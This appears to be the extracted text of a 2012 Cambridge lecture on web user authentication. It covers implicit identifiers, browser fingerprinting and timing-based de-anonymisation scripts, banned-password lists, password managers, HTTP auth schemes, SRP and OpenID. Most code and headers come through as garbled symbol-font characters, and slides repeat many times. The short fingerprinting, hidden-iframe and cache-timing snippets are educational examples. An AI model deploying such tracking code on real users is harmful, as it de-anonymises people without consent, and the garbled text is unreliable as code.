❍♦st✿ ✇✇✇✳❝❧✳❝❛♠✳❛❝✳✉❦ ❯s❡r✲❆❣❡♥t✿ ▼♦③✐❧❧❛✴✺✳✵ ✭❳✶✶❀ ❯❀ ▲✐♥✉① ✐✻✽✻❀ ❡♥✲●❇❀ r✈✿✶✳✾✳✷✳✶✷✮ ●❡❝❦♦✴✷✵✶✵✶✵✷✼ ❯❜✉♥t✉✴✾✳✶✵ ✭❦❛r♠✐❝✮ ❋✐r❡❢♦①✴✸✳✻✳✶✷ ❆❝❝❡♣t✿ t❡①t✴❤t♠❧✱ ❛♣♣❧✐❝❛t✐♦♥✴①❤t♠❧✰①♠❧✱ ❛♣♣❧✐❝❛t✐♦♥✴①♠❧❀ q❂✵✳✾✱✯✴✯ ❆❝❝❡♣t✲▲❛♥❣✉❛❣❡✿ ❡♥✲❣❜✱❡♥❀q❂✵✳✺ ❆❝❝❡♣t✲❊♥❝♦❞✐♥❣✿ ❣③✐♣✱❞❡❢❧❛t❡ ❆❝❝❡♣t✲❈❤❛rs❡t✿ ■❙❖✲✽✽✺✾✲✶✱✉t❢✲✽❀q❂✵✳✼✱✯❀

1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Implicit identifiers

• ❊❚ ✴ ❍❚❚P✴✶✳✶

❍♦st✿ ✇✇✇✳❝❧✳❝❛♠✳❛❝✳✉❦ ❘❡❢❡r❡r✿ ❤tt♣✿✴✴✇✇✇✳❜✐♥❣✳❝♦♠✴s❡❛r❝❤❄ q❂✇❤❛t✪✷✼s✰t❤❡✰❜❡st✰✉♥✐✈❡rs✐t②

1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Implicit identifiers

• ❊❚ ✴ ❍❚❚P✴✶✳✶

❍♦st✿ ✇✇✇✳❝❧✳❝❛♠✳❛❝✳✉❦ ❘❡❢❡r❡r✿ ❤tt♣✿✴✴✇✇✇✳❢❛❝❡❜♦♦❦✳❝♦♠✴♣r♦❢✐❧❡✳♣❤♣❄ ✐❞❂✶✺✶✶✸✺✾✹✻✺

1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Implicit identifiers

✴✴❞❡t❡❝t s❝r❡❡♥ r❡s♦❧✉t✐♦♥ ① ❂ s❝r❡❡♥✳✇✐❞t❤❀ ② ❂ s❝r❡❡♥✳❤❡✐❣❤t❀ ✴✴❞❡t❡❝t ♣❧✉❣✐♥s q ❂ ♥❛✈✐❣❛t♦r✳♠✐♠❡❚②♣❡s❬✧✈✐❞❡♦✴q✉✐❝❦t✐♠❡✧❪❀ ❥ ❂ ♥❛✈✐❣❛t♦r✳❥❛✈❛❊♥❛❜❧❡❞✭✮❀ ✴✴❞❡t❡❝t t✐♠❡ ③♦♥❡ t③ ❂ ✭♥❡✇ ❉❛t❡✭✮✮✳❣❡t❚✐♠❡③♦♥❡❖❢❢s❡t✭✮❀

1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Implicit identifiers

1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Implicit identifiers

★ ❙❡♥❞ ✉s❡rs t♦ ♠② ❞❡t❡❝t♦r✳✳✳ ❁✐❢r❛♠❡ ♥❛♠❡❂✧❞❡t❡❝t♦r✧ ✇✐❞t❤❂✧✵✧ ❤❡✐❣❤t❂✧✵✧ ❢r❛♠❡❜♦r❞❡r❂✧✵✧ sr❝❂✧❤tt♣s✿✴✴❞♦❝s✳❣♦♦❣❧❡✳❝♦♠✴❞♦❝✉♠❡♥t✴❞✴ ✶❚❯❱✾①✶❧❋❆◗❝❱❲✈❤P✹❊❆❍◗❩■Pr❱♠♦✸❴✈r③✺❙③✽❲♦✧❃ ❁✴✐❢r❛♠❡❃

Narayanan 2009 1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Implicit identifiers

Narayanan 2009 1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Implicit identifiers

❁✐♠❣ ✐❞❂✧t❡st✧ st②❧❡❂✧❞✐s♣❧❛②✿♥♦♥❡✧❃ ❁s❝r✐♣t❃ t❡st ❂ ❞♦❝✉♠❡♥t✳❣❡t❊❧❡♠❡♥t❇②■❞✭✬t❡st✬✮❀ ✈❛r st❛rt ❂ ♥❡✇ ❉❛t❡✭✮❀ t❡st✳♦♥❡rr♦r ❂ ❢✉♥❝t✐♦♥✭✮ ④ t✐♠❡ ❂ ♥❡✇ ❉❛t❡✭✮ ✲ st❛rt❀⑥ t❡st✳sr❝ ❂ ✏✧❤tt♣✿✴✴✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✴✑❀ ❁✴s❝r✐♣t❃

Bortz et al. 2007 1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Talk outline

1

What are we trying to achieve?

2

What’s done in practice

3

What goes wrong

4

Can we do better?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 31 / 41

Password alternatives

Mitigates: Guessing attacks, phishing?, malware

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 32 / 41

Password alternatives

Mitigates: Guessing attacks, malware?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 32 / 41

Password alternatives

Mitigates: Brute-force attacks?, trawling attacks?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 32 / 41

Password alternatives

0.0 0.2 0.4 0.6 0.8 1.0 success rate α 5 10 15 20 25 30 35 40 marginal guesswork ˜ µα

Forename Surname Password [RockYou] Password [Klein] Password [Spafford] Password [Schneier] Mnemonic [Kuo] Pass-Go PassPoints Passfaces

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 32 / 41

Better password choices

Microsoft password advice Mitigates: Password guessing

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 33 / 41

Better password choices

To construct a good password, create a simple sentence of 8 words and choose letters from the words to make up a password. You might take the initial or final letters; you should put some letters in upper case to make the password harder to guess; and at least one number and/or special character should be inserted as

• well. Use this method to generate a password of 7 or 8 characters.

Yan et al. 2004 Mitigates: Password guessing

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 33 / 41

Better password choices

0.0 0.2 0.4 0.6 0.8 1.0 success rate α 5 10 15 20 25 30 35 40 marginal guesswork ˜ µα

Forename Surname Password [RockYou] Password [Klein] Password [Spafford] Password [Schneier] Mnemonic [Kuo]

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 33 / 41

Better password choices

Mitigates: Password guessing

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 33 / 41

Better password choices

t✇ttr✳❇❆◆◆❊❉❴P❆❙❙❲❖❘❉❙ ❂ ❬ ✧✵✵✵✵✵✵✧✱ ✧✶✶✶✶✶✶✧✱ ✧✶✶✶✶✶✶✶✶✧✱ ✧✶✶✷✷✸✸✧✱ ✧✶✷✶✷✶✷✧✱ ✧✶✷✸✶✷✸✧✱ ✧✶✷✸✹✺✻✧✱ ✧✶✷✸✹✺✻✼✧✱ ✧✶✷✸✹✺✻✼✽✧✱ ✧✶✷✸✹✺✻✼✽✾✧✱ ✧✶✸✶✸✶✸✧✱ ✧✷✸✷✸✷✸✧✱ ✧✻✺✹✸✷✶✧✱ ✧✻✻✻✻✻✻✧✱ ✧✻✾✻✾✻✾✧✱ ✧✼✼✼✼✼✼✧✱ ✧✼✼✼✼✼✼✼✧✱ ✧✽✻✼✺✸✵✾✧✱ ✧✾✽✼✻✺✹✧✱ ✧❛❛❛❛❛❛✧✱ ✧❛❜❝✶✷✸✧✱ ✧❛❜❝✶✷✸✧✱ ✧❛❜❝❞❡❢✧✱ ✧❛❜❣rt②✉✧✱ ✧❛❝❝❡ss✧✱ ✧❛❝❝❡ss✶✹✧✱ ✧❛❝t✐♦♥✧✱ ✧❛❧❜❡rt✧✱ ✧❛❧❜❡rt♦✧✱ ✧❛❧❡①✐s✧✱ ✧❛❧❡❥❛♥❞r❛✧✱ ✧❛❧❡❥❛♥❞r♦✧✱ ✧❛♠❛♥❞❛✧✱ ✧❛♠❛t❡✉r✧✱ ✧❛♠❡r✐❝❛✧✱ ✧❛♥❞r❡❛✧✱ ✧❛♥❞r❡✇✧✱ ✧❛♥❣❡❧❛✧✱ ✧❛♥❣❡❧s✧✱ ✧❛♥✐♠❛❧✧✱ ✧❛♥t❤♦♥②✧✱ ✧❛♣♦❧❧♦✧✱ ✧❛♣♣❧❡s✧✱ ✧❛rs❡♥❛❧✧✱ ✧❛rt❤✉r✧✱ ✧❛s❞❢❣❤✧✱ ✧❛s❞❢❣❤✧✱ ✧❛s❤❧❡②✧✱ ✧❛ss❤♦❧❡✧✱ ✧❛✉❣✉st✧✱ ✧❛✉st✐♥✧✱ ✧❜❛❞❜♦②✧✱ ✧❜❛✐❧❡②✧✱ ✧❜❛♥❛♥❛✧✱ ✧❜❛r♥❡②✧✱ ✧❜❛s❡❜❛❧❧✧✱ ✧❜❛t♠❛♥✧✱ ✧❜❡❛tr✐③✧✱ ✧❜❡❛✈❡r✧✱ ✧❜❡❛✈✐s✧✱ ✧❜✐❣❝♦❝❦✧✱ ✧❜✐❣❞❛❞❞②✧✱ ✧❜✐❣❞✐❝❦✧✱ ✧❜✐❣❞♦❣✧✱ ✧❜✐❣t✐ts✧✱ ✧❜✐r❞✐❡✧✱ ✧❜✐t❝❤❡s✧✱ ✧❜✐t❡♠❡✧✱ ✧❜❧❛③❡r✧✱ ✧❜❧♦♥❞❡✧✱ ✧❜❧♦♥❞❡s✧✱ ✧❜❧♦✇❥♦❜✧✱ ✧❜❧♦✇♠❡✧✱ ✧❜♦♥❞✵✵✼✧✱ ✧❜♦♥✐t❛✧✱ ✧❜♦♥♥✐❡✧✱ ✧❜♦♦❜♦♦✧✱ ✧❜♦♦❣❡r✧✱ ✧❜♦♦♠❡r✧✱ ✧❜♦st♦♥✧✱ ✧❜r❛♥❞♦♥✧✱ ✧❜r❛♥❞②✧✱ ✧❜r❛✈❡s✧✱ ✧❜r❛③✐❧✧✱ ✧❜r♦♥❝♦✧✱ ✧❜r♦♥❝♦s✧✱ ✧❜✉❧❧❞♦❣✧✱ ✧❜✉st❡r✧✱ ✧❜✉tt❡r✧✱ ✧❜✉tt❤❡❛❞✧✱ ✧❝❛❧✈✐♥✧✱ ✧❝❛♠❛r♦✧✱ ✧❝❛♠❡r♦♥✧✱ ✧❝❛♥❛❞❛✧✱ ✧❝❛♣t❛✐♥✧✱ ✧❝❛r❧♦s✧✱ ✧❝❛rt❡r✧✱ ✧❝❛s♣❡r✧✱ ✧❝❤❛r❧❡s✧✱ ✧❝❤❛r❧✐❡✧✱ ✧❝❤❡❡s❡✧✱ ✧❝❤❡❧s❡❛✧✱ ✧❝❤❡st❡r✧✱ ✧❝❤✐❝❛❣♦✧✱ ✧❝❤✐❝❦❡♥✧✱ ✧❝♦❝❛❝♦❧❛✧✱ ✧❝♦❢❢❡❡✧✱ ✳✳✳ ✧t❡q✉✐❡r♦✧✱ ✧t❛②❧♦r✧✱ ✧t❡♥♥✐s✧✱ ✧t❡r❡s❛✧✱ ✧t❡st❡r✧✱ ✧t❡st✐♥❣✧✱ ✧t❤❡♠❛♥✧✱ ✧t❤♦♠❛s✧✱ ✧t❤✉♥❞❡r✧✱ ✧t❤①✶✶✸✽✧✱ ✧t✐❢❢❛♥②✧✱ ✧t✐❣❡rs✧✱ ✧t✐❣❣❡r✧✱ ✧t♦♠❝❛t✧✱ ✧t♦♣❣✉♥✧✱ ✧t♦②♦t❛✧✱ ✧tr❛✈✐s✧✱ ✧tr♦✉❜❧❡✧✱ ✧tr✉st♥♦✶✧✱ ✧t✉❝❦❡r✧✱ ✧t✉rt❧❡✧✱ ✧t✇✐tt❡r✧✱ ✧✉♥✐t❡❞✧✱ ✧✈❛❣✐♥❛✧✱ ✧✈✐❝t♦r✧✱ ✧✈✐❝t♦r✐❛✧✱ ✧✈✐❦✐♥❣✧✱ ✧✈♦♦❞♦♦✧✱ ✧✈♦②❛❣❡r✧✱ ✧✇❛❧t❡r✧✱ ✧✇❛rr✐♦r✧✱ ✧✇❡❧❝♦♠❡✧✱ ✧✇❤❛t❡✈❡r✧✱ ✧✇✐❧❧✐❛♠✧✱ ✧✇✐❧❧✐❡✧✱ ✧✇✐❧s♦♥✧✱ ✧✇✐♥♥❡r✧✱ ✧✇✐♥st♦♥✧✱ ✧✇✐♥t❡r✧✱ ✧✇✐③❛r❞✧✱ ✧①❛✈✐❡r✧✱ ✧①①①①①①✧✱ ✧①①①①①①①①✧✱ ✧②❛♠❛❤❛✧✱ ✧②❛♥❦❡❡✧✱ ✧②❛♥❦❡❡s✧✱ ✧②❡❧❧♦✇✧✱ ✧③①❝✈❜♥✧✱ ✧③①❝✈❜♥♠✧✱ ✧③③③③③③✧❪❀

Twitter banned password list Mitigates: Password guessing

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 33 / 41

Better password choices

❞✐❝❡✇❛r❡ ✶✻✻✻✺✶✺✻✺✸✶✺✻✺✸✺✻✸✷✷✸✺✻✶✻✻✺✷✷✹ ✶ ✻ ✻ ✻ ✺ ❝❧❡❢t ✶ ✺ ✻ ✺ ✸ ❝❛♠ ✺ ✻ ✸ ✷ ✷ s②♥♦❞ ✸ ✺ ✻ ✶ ✻ ❧❛❝② ✻ ✺ ✷ ✷ ✹ ②r ♣❛ss✇♦r❞ ❂ ❝❧❡❢t❝❛♠s②♥♦❞❧❛❝②②r Diceware Mitigates: Password guessing

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 33 / 41

Better password choices

More can be less...

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 33 / 41

Password managers

Chrome password manager Mitigates: password recovery, weak passwords?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 34 / 41

Password managers

PasswordManager ProTM Mitigates: password recovery, weak passwords?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 34 / 41

Password managers

PwdHash (Firefox extension) Mitigates: password recovery, weak passwords, pass- word re-use, cross-site password compromise

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 34 / 41

Password managers

PwdHash (remote interface) Mitigates: password recovery, weak passwords, pass- word re-use, cross-site password compromise

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 34 / 41

Better backup authentication

Mitigates: Question guessing, email as failure point

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 35 / 41

Better backup authentication

Schecther et al. 2008

Mitigates: Question guessing, email as failure point

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 35 / 41

Better backup authentication

Schecther et al. 2008

Mitigates: Question guessing, email as failure point

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 35 / 41

Better backup authentication

Mitigates: Question guessing, email as failure point

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 35 / 41

Better backup authentication

Mitigates: Account takeover

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 35 / 41

Better cookie semantics

❍❚❚P✴✶✳✶ ✸✵✷ ▼♦✈❡❞ ❚❡♠♣♦r❛r✐❧② ❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ▲♦❝❛t✐♦♥✿ ❤tt♣✿✴✴✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✴♠❛✐♥ ❙❡t✲❈♦♦❦✐❡✿ ✉s❡r❴✐❞❂✽✷✶✶✽✸❀ ❡①♣✐r❡s❂❙❛t✱ ✶✶✲❉❡❝✲✷✵✶✵ ✶✺✿✹✽✿✸✽ ●▼❚❀ ♣❛t❤❂✴❀ ❙❡t✲❈♦♦❦✐❡✿ ❛✉t❤❂❢✵❡❜✻❛✶❜❞❢❢✳✳✳ ❡①♣✐r❡s❂❙❛t✱ ✶✶✲❉❡❝✲✷✵✶✵ ✶✺✿✹✽✿✸✽ ●▼❚❀ ♣❛t❤❂✴❀ ❤tt♣♦♥❧②❀ ❈♦♥t❡♥t✲▲❡♥❣t❤✿ ✵ 128.28.2.138 ← − https://www.example.com Mitigates: cross-site scripting

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 36 / 41

Better cookie semantics

❍❚❚P✴✶✳✶ ✸✵✷ ▼♦✈❡❞ ❚❡♠♣♦r❛r✐❧② ❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ▲♦❝❛t✐♦♥✿ ❤tt♣✿✴✴✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✴♠❛✐♥ ❙❡t✲❈♦♦❦✐❡✿ ✉s❡r❴✐❞❂✽✷✶✶✽✸❀ ❡①♣✐r❡s❂❙❛t✱ ✶✶✲❉❡❝✲✷✵✶✵ ✶✺✿✹✽✿✸✽ ●▼❚❀ ♣❛t❤❂✴❀ ❙❡t✲❈♦♦❦✐❡✿ ❛✉t❤❂❢✵❡❜✻❛✶❜❞❢❢✳✳✳ ❡①♣✐r❡s❂❙❛t✱ ✶✶✲❉❡❝✲✷✵✶✵ ✶✺✿✹✽✿✸✽ ●▼❚❀ ♣❛t❤❂✴❀ s❡❝✉r❡❀ ❈♦♥t❡♥t✲▲❡♥❣t❤✿ ✵ 128.28.2.138 ← − https://www.example.com Mitigates: post-TLS cookie stealing

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 36 / 41

Designed login protocols

• ❊❚ ✴ ❍❚❚P✴✶✳✶

❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ 128.28.2.138 − → www.example.com ❍❚❚P✴✶✳✶ ✹✵✶ ❆✉t❤♦r✐③❛t✐♦♥ ❘❡q✉✐r❡❞ ❈♦♥t❡♥t ❧❡♥❣t❤✿ ✼✻✻✶ ❈♦♥t❡♥t✲❚②♣❡✿ t❡①t✴❤t♠❧ ❲❲❲✲❆✉t❤❡♥t✐❝❛t❡✿ ❇❛s✐❝ r❡❛❧♠❂✧❡①❛♠♣❧❡✳❝♦♠✧ 128.28.2.138 ← − www.example.com HTTP basic access authentication Mitigates: cookie theft

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 37 / 41

Designed login protocols

HTTP basic access authentication Mitigates: cookie theft

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 37 / 41

Designed login protocols

• ❊❚ ✴ ❍❚❚P✴✶✳✶

❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ❆✉t❤♦r✐③❛t✐♦♥✿ ❇❛s✐❝ ❛♠◆✐❖❉■✻❜♠❧❥❩❳❘②❡◗❂❂ 128.28.2.138 − → www.example.com auth = encodebase64(user||pass) HTTP basic access authentication Mitigates: cookie theft

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 37 / 41

Designed login protocols

• ❊❚ ✴ ❍❚❚P✴✶✳✶

❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ 128.28.2.138 − → www.example.com ❍❚❚P✴✶✳✶ ✹✵✶ ❆✉t❤♦r✐③❛t✐♦♥ ❘❡q✉✐r❡❞ ❈♦♥t❡♥t ❧❡♥❣t❤✿ ✼✻✻✶ ❈♦♥t❡♥t✲❚②♣❡✿ t❡①t✴❤t♠❧ ❲❲❲✲❆✉t❤❡♥t✐❝❛t❡✿ ❉✐❣❡st r❡❛❧♠❂✧❡①❛♠♣❧❡✳❝♦♠✧ q♦♣❂✧❛✉t❤✱❛✉t❤✲✐♥t✧✱ ♥♦♥❝❡❂✧❞❝❞✾✽❜✼✶✵✷❞❞✷❢✵❡✽❜✶✶❞✵❢✻✵✵❜❢❜✵❝✵✾✸✧ 128.28.2.138 ← − www.example.com HTTP digest access authentication Mitigates: password sniffing, database compromise

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 37 / 41

Designed login protocols

• ❊❚ ✴ ❍❚❚P✴✶✳✶

❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ❆✉t❤♦r✐③❛t✐♦♥✿ ❉✐❣❡st ✉s❡r♥❛♠❡❂✧❥❝❜✽✷✧✱ r❡❛❧♠❂✧✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✧✱ ♥♦♥❝❡❂✧❞❝❞✾✽❜✼✶✵✷❞❞✷❢✵❡✽❜✶✶❞✵❢✻✵✵❜❢❜✵❝✵✾✸✧✱ ❝♥♦♥❝❡❂✧✵❛✹❢✶✶✸❜✧✱ ♥❝❂✵✵✵✵✵✵✵✶✱ q♦♣❂❛✉t❤✱ ✉r✐❂✧✴❞✐r✴✐♥❞❡①✳❤t♠❧✧✱ r❡s♣♦♥s❡❂✧✻✻✷✾❢❛❡✹✾✸✾✸❛✵✺✸✾✼✹✺✵✾✼✽✺✵✼❝✹❡❢✶✧✱ 128.28.2.138 − → www.example.com

• resp. = H(H(user||pass)||nserver||countern||nclient||H(params))

HTTP digest access authentication Mitigates: password sniffing, database compromise

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 37 / 41

Designed login protocols

TLS client certificates Mitigates: password sniffing, phishing, DB compromise

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 37 / 41

Designed login protocols

Public parameters: N = 2q + 1, q, g : |g| = q, k ∈ ZN Setup: C − → S : C, p S : s R ← ZN, x ← H(s, p), store C, v = gx) (mod N) Authentication: C − → S : C, A = ga (mod N) S − → C : s, B = k · v + gb (mod N) C : x ← H(s, p), K ← H

• (B − k · gx)a+x·H(A,B)

S : K ← H

• (A · vH(A,B))b

Secure Remote Password (SRP) Protocol Mitigates: password sniffing, phishing, DB compromise

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 37 / 41

Single sign-on

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 38 / 41

Single sign-on

R Relying party (www.example.com) P OpenID Provider (Facebook, Google, etc.) UE End user (a human) UA User agent (a browser) UE − → R I’m U@P! OpenID Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Single sign-on

OpenID Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Single sign-on

R Relying party (www.example.com) P OpenID Provider (Facebook, Google, etc.) UE End user (a human) UA User agent (a browser) UE − → R I’m U@P! R ← → P KR-P, n ← D-H key exchange OpenID Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Single sign-on

R Relying party (www.example.com) P OpenID Provider (Facebook, Google, etc.) UE End user (a human) UA User agent (a browser) UE − → R I’m U@P! R ← → P KR-P, n ← D-H key exchange UE ← − R OK, go verify with P (❍❚❚P ✸✵✷) UE − → P I want to talk to R, who you share n with OpenID Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Single sign-on

R Relying party (www.example.com) P OpenID Provider (Facebook, Google, etc.) UE End user (a human) UA User agent (a browser) UE − → R I’m U@P! R ← → P KR-P, n ← D-H key exchange UE ← − R OK, go verify with P (❍❚❚P ✸✵✷) UE − → P I want to talk to R, who you share n with UE ← − P Are you sure you want to talk to R? OpenID Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Single sign-on

OpenID Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Single sign-on

R Relying party (www.example.com) P OpenID Provider (Facebook, Google, etc.) UE End user (a human) UA User agent (a browser) UE − → R I’m U@P! R ← → P KR-P, n ← D-H key exchange UE ← − R OK, go verify with P (❍❚❚P ✸✵✷) UE − → P I want to talk to R, who you share n with UE ← − P Sure you want to talk to R? UE − → P Yes, here’s my password: p OpenID Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Single sign-on

R Relying party (www.example.com) P OpenID Provider (Facebook, Google, etc.) UE End user (a human) UA User agent (a browser) UE − → R I’m U@P! R ← → P KR-P, n ← D-H key exchange UE ← − R OK, go verify with P (❍❚❚P ✸✵✷) UE − → P I want to talk to R, who you share n with UE ← − P Sure you want to talk to R? UE − → P Yes, here’s my password: p UE ← − P Okay, use MACKR-P(U, P) (❍❚❚P ✸✵✷) UE − → R MACKR-P(U, P)! See, I’m U@P OpenID Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Single sign-on

R Relying party (www.example.com) P OpenID Provider (Facebook, Google, etc.) UE End user (a human) UA User agent (a browser) UE − → R I’m U@P! R ← → P KR-P, n ← D-H key exchange UA ← − R OK, go verify with P (❍❚❚P ✸✵✷) UA − → P I want to talk to R, here’s my cookie c UA ← − P Okay, use MACKR-P(U, P) UA − → R MACKR-P(U, P)! See, I’m U@P OpenID (❛✉t❤✲✐♠♠❡❞✐❛t❡) Mitigates: password re-use

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 39 / 41

Avoiding password collection

www.bugmenot.com/view/nytimes.com Mitigates: password re-use across security domains, database compromise

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 40 / 41

Avoiding password collection

100 200 300 400 500 Traffic rank 0.0 0.2 0.4 0.6 0.8 1.0 Proportion of sites collecting passwords

Passwords collected Bugmenot sharing blocked

Blacklisted sites from Bugmenot

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 40 / 41

Questions

❥❝❜✽✷❅❝❧✳❝❛♠✳❛❝✳✉❦

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 41 / 41